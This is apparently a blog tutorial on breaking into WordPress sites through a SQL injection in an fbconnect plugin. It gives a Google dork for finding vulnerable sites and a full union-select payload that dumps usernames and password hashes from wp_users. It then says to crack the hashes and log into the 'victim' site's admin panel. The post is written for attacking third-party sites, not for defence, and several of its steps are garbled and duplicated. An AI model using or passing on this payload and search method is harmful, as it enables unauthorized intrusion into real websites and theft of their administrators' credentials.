So its a New Tut of Wordpress Blog Hacking,,, Lets Start ...
Open Google.com and enter This Dork
inurl:"fbconnect_action=myhome"
![[Image: untitled24.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjgCExZOQV-MoSAaX17nBRA-W1g7ukyDFTOfhGPNIz-a19KqSzX708kW5mIr6lzIX8K5l8AAVxeYBpBzPkvTweSsetsP09Cc83Giw4iwCjvObW8upvvIsTh0-R-E2JJvN9YOMMWEE_7uGR/s400/untitled24.JPG)
You will find many sites, Select the site which you are comfortable with.
![[Image: untitled22.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF8vmjeZ204duFIF9F9PM3FfEaywXAsg7Y6EgKmcPlaGFJ85lOnu9y9WIQx5h1GllUK7SHtE2wf6cE9l3xYlAy9HagPFIjknCxyudhR1fPmW25C1nEUDxBqZaPvDB9WKP3xSKDWS1ptphX/s400/untitled22.JPG)
The website Url will be Like this http://www.site.com/?fbconnect_action=myhome&userid=
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
![[Image: untitled23.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw2TmMa0lW42L-TGdNIThmGu9Gqr5HOvf3_RbesgY55sRdhHh5vq7YQ9A-b_Gl9yer6-3zHeH_vCV0WPWewCEAVgreS-SnDZt73zDsFMKmz26i3-wVJQKMPDlMP2iJOR6d_CpRCsBMjWBl/s400/untitled23.JPG)
he password is encrypted with Wordpress md5 (blowfish). You need to decode this.Download And Run This Software to decode this type of password
Then find the administrator panel out. Normally it should be in
www.victrimsite.com/wp-admin
![[Image: untitled26.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg86xfB4jXGlmRnUOBo3_a0eQXCne5OcjqxvFHHT-0_PrtCnF5PuwE85NhQc1giFQVYn18iPjz17xjoJ-1unrA5I6fR1zx5W2OZF45CYQkOfuIkCOMPol1Bayw0MI4Q0E8rSZEPHtCkc2tQ/s400/untitled26.JPG)
Open Google.com and enter This Dork
inurl:"fbconnect_action=myhome"
You will find many sites, Select the site which you are comfortable with.
Now replace the ?fbconnect_action=myhome&userid= with
?fbconnect_action=myhome&userid=
with this?fbconnect_action=myhome&userid=
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
Now The URL will be Like this ..
www.site.com/?fbconnect_action=myhome&userid=
with this
www.site.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
Now you have the User name and Password.
with this
www.site.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
Now you have the User name and Password.
Then find the administrator panel out. Normally it should be in
www.victrimsite.com/wp-admin
or
www.victrimsite.com/wp-login.php
Last Step : TYPE THE DECRYPTED USERNAME AND PASSWORD and Login In website :)
0 comments:
Post a Comment